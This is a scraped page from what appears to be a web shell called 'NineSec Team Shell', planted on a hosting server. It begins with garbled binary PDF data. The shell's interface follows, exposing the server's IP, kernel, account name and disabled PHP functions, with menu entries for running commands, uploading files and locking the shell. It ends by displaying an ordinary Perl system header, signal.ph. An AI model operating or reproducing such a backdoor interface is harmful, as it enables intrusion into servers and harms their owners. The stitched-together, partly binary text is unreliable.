%PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 2a02:4780:6:1422:0:e17:6acc:2  /  Your IP : 216.73.217.64
Web Server : LiteSpeed
System : Linux id-dci-web1322.main-hosting.eu 4.18.0-553.109.1.lve.el8.x86_64 #1 SMP Thu Mar 5 20:23:46 UTC 2026 x86_64
User : u236415692 ( 236415692)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/../lib64/gio/../perl5/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/../lib64/gio/../perl5/signal.ph
require '_h2ph_pre.ph';

no warnings qw(redefine misc);

unless(defined(&_SIGNAL_H)) {
    eval 'sub _SIGNAL_H () {1;}' unless defined(&_SIGNAL_H);
    require 'features.ph';
    require 'bits/types.ph';
    require 'bits/signum.ph';
    require 'bits/types/sig_atomic_t.ph';
    if(defined (&__USE_POSIX)) {
	require 'bits/types/sigset_t.ph';
    }
    if(defined (&__USE_XOPEN) || defined (&__USE_XOPEN2K)) {
	unless(defined(&__pid_t_defined)) {
	    eval 'sub __pid_t_defined () {1;}' unless defined(&__pid_t_defined);
	}
	if(defined(&__USE_XOPEN)) {
	}
	unless(defined(&__uid_t_defined)) {
	    eval 'sub __uid_t_defined () {1;}' unless defined(&__uid_t_defined);
	}
    }
    if(defined(&__USE_POSIX199309)) {
	require 'bits/types/struct_timespec.ph';
    }
    if(defined (&__USE_POSIX199309) || defined (&__USE_XOPEN_EXTENDED)) {
	require 'bits/types/siginfo_t.ph';
	require 'bits/siginfo-consts.ph';
    }
    if(defined(&__USE_MISC)) {
	require 'bits/types/sigval_t.ph';
    }
    if(defined(&__USE_POSIX199309)) {
	require 'bits/types/sigevent_t.ph';
	require 'bits/sigevent-consts.ph';
    }
    if(defined(&__USE_GNU)) {
    }
    if(defined(&__USE_MISC)) {
    } else {
	if(defined(&__REDIRECT_NTH)) {
	} else {
	    eval 'sub signal () { &__sysv_signal;}' unless defined(&signal);
	}
    }
    if(defined (&__USE_XOPEN_EXTENDED)  && !defined (&__USE_XOPEN2K8)) {
    }
    if(defined(&__USE_POSIX)) {
    }
    if(defined (&__USE_MISC) || defined (&__USE_XOPEN_EXTENDED)) {
    }
    if(defined(&__USE_MISC)) {
    }
    if(defined(&__USE_XOPEN2K8)) {
    }
    if(defined(&__USE_XOPEN_EXTENDED)) {
	if(defined(&__GNUC__)) {
	} else {
	    eval 'sub sigpause {
	        my($sig) = @_;
    		eval q( &__sigpause (($sig), 1));
	    }' unless defined(&sigpause);
	}
    }
    if(defined(&__USE_MISC)) {
	eval 'sub sigmask {
	    my($sig) = @_;
    	    eval q(((1 << (($sig) - 1))));
	}' unless defined(&sigmask);
    }
    if(defined(&__USE_MISC)) {
	eval 'sub NSIG () { &_NSIG;}' unless defined(&NSIG);
    }
    if(defined(&__USE_GNU)) {
    }
    if(defined(&__USE_MISC)) {
    }
    if(defined(&__USE_POSIX)) {
	if(defined(&__USE_GNU)) {
	}
	require 'bits/sigaction.ph';
	if(defined(&__USE_POSIX199506)) {
	}
	if(defined(&__USE_POSIX199309)) {
	}
    }
    if(defined(&__USE_MISC)) {
	require 'bits/sigcontext.ph';
    }
    if(defined (&__USE_XOPEN_EXTENDED) || defined (&__USE_XOPEN2K8)) {
	eval 'sub __need_size_t () {1;}' unless defined(&__need_size_t);
	require 'stddef.ph';
	require 'bits/types/stack_t.ph';
	if(defined (&__USE_XOPEN) || defined (&__USE_XOPEN2K8)) {
	    require 'sys/ucontext.ph';
	}
    }
    if(defined (&__USE_XOPEN_EXTENDED) || defined (&__USE_MISC)) {
	require 'bits/sigstack.ph';
	require 'bits/ss_flags.ph';
    }
    if(((defined (&__USE_XOPEN_EXTENDED)  && !defined (&__USE_XOPEN2K8)) || defined (&__USE_MISC))) {
	require 'bits/types/struct_sigstack.ph';
    }
    if(((defined (&__USE_XOPEN_EXTENDED)  && !defined (&__USE_XOPEN2K)) || defined (&__USE_MISC))) {
    }
    if(defined(&__USE_XOPEN_EXTENDED)) {
    }
    if(defined (&__USE_POSIX199506) || defined (&__USE_UNIX98)) {
	require 'bits/pthreadtypes.ph';
	require 'bits/sigthread.ph';
    }
    eval 'sub SIGRTMIN () {( &__libc_current_sigrtmin ());}' unless defined(&SIGRTMIN);
    eval 'sub SIGRTMAX () {( &__libc_current_sigrtmax ());}' unless defined(&SIGRTMAX);
}
1;

NineSec Team - 2022